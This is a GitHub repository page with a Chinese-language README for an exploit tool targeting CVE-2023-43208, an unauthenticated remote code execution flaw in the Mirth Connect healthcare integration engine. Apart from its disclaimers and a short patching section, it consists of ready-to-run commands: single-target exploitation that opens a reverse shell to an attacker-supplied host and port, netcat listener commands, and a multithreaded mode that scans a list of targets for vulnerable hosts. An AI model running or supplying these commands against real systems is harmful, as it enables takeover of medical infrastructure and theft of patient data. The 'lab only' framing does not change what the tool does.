MKIRAHMET/PoC-2023-43208

GitHub: MKIRAHMET/PoC-2023-43208

针对 CVE-2023-43208 的 PoC 利用工具,可对 Mirth Connect 4.4.1 之前版本实施未经认证的远程代码执行攻击。

Stars: 3 | Forks: 0

# CVE-2023-43208-EXPLOIT ## Mirth Connect 远程代码执行 (RCE) 漏洞利用 ![Python Version](https://img.shields.io/badge/python-3.7%2B-blue) ![Version](https://img.shields.io/badge/version-1.0-red) ![CVE](https://img.shields.io/badge/CVE-2023--43208-critical) ![Lab Use Only](https://img.shields.io/badge/use-lab%20only-orange) 针对 CVE-2023-43208 的概念验证漏洞利用程序,这是 Mirth Connect 4.4.1 之前版本中的一个远程代码执行漏洞。 ## 🚨 重要法律免责声明 **本工具仅用于:** - 🧪 **教育目的** - 🔬 **实验室环境下的授权安全测试** - 📚 **网络安全研究与学习** **切勿用于:** - ❌ 攻击您不拥有的系统 - ❌ 未获得明确书面许可的情况 - ❌ 生产环境 - ❌ 非法或恶意目的 **您有责任遵守所有适用的法律和法规。滥用此工具可能会导致刑事指控。** ## 📋 描述 此漏洞利用程序针对 Mirth Connect `/api/users` 端点中的 XML 反序列化漏洞,允许在受影响版本(< 4.4.1)上执行未经身份验证的远程代码。 **这是一个严重 (CRITICAL) 漏洞,应仅在您自己系统的独立实验室环境中进行测试。** ## 🔧 需求 - Python 3.7 或更高版本 - `requirements.txt` 中列出的所需依赖包 - **一个实验室环境**,配备含有漏洞的 Mirth Connect 实例 ## 🚀 安装 # 克隆仓库 git clone https://github.com/M0h4/CVE-2023-43208-EXPLOIT.git cd CVE-2023-43208-EXPLOIT # 安装依赖 pip install -r requirements.txt 💻 用法(仅供实验室使用) 交互模式(推荐实验室使用) bash python exploit.py 命令行模式 bash # 单一目标利用(仅供实验室使用) python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 # 从文件扫描多个目标(仅供实验室使用) python exploit.py -f targets.txt -t 50 -o vulnerable.txt # 非交互模式(仅供实验室使用) python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 --no-interactive 选项 text -u, --url 要利用的目标 URL(仅供实验室使用) -lh, --lhost 监听主机(您的 IP) -lp, --lport 监听端口 -f, --file 包含要扫描的目标 URL 的文件 -o, --output 用于保存扫描结果的输出文件 -t, --threads 扫描使用的线程数(默认:50) --no-interactive 以非交互模式运行 🎯 实验室环境示例 搭建您的实验室: 在隔离的虚拟机中安装含有漏洞的 Mirth Connect 版本(< 4.4.1) 使用受控网络(例如 VirtualBox/VMware 中的 NAT/Host-only) 切勿暴露于互联网 启动您的监听器: ncat -lnvp 4444 # 或者 nc -lnvp 4444 在您的实验室中运行漏洞利用程序: python exploit.py -u https://192.168.1.100:8443 -lh 192.168.1.50 -lp 4444 🧪 测试环境要求 隔离网络/VLAN 仅限虚拟机 无生产数据 防火墙规则阻止外部访问 记录适当的授权 📝 技术细节 漏洞类型:XML 反序列化 RCE 受影响版本:Mirth Connect < 4.4.1 修复版本:4.4.1 及以上 CVSS 评分:9.8(严重) 攻击向量:网络 身份验证:无需认证 该漏洞利用程序通过 /api/users 端点,利用 Commons Collections gadgets 实现 RCE。 🛡️ 防护措施 如果您正在运行 Mirth Connect: ✅ 更新至 4.4.1 或更高版本 ✅ 限制对管理界面的网络访问 ✅ 实施适当的身份验证 ✅ 监控可疑的 XML 载荷 👥 致谢 原作者:K3ysTr0K3R & Chocapikk 修改者:M0h4 CVE:CVE-2023-43208 ⚠️ 最后警告 ╔══════════════════════════════════════════════════════════════╗ ║ 本工具仅供实验室使用 ║ ║ 未经授权的使用是非法且不道德的 ║ ║ 您需承担所有风险和责任 ║ ║ 作者不对滥用行为承担任何责任 ║ ╚══════════════════════════════════════════════════════════════╝
标签:CISA项目, CVE-2023-43208, Mirth Connect, Mirth Connect < 4.4.1, PoC, Python, Python脚本, RCE, XML反序列化, 医疗安全, 攻击脚本, 无后门, 暴力破解, 未授权访问, 概念验证, 编程工具, 网络安全, 远程代码执行, 逆向工具, 隐私保护, 高危漏洞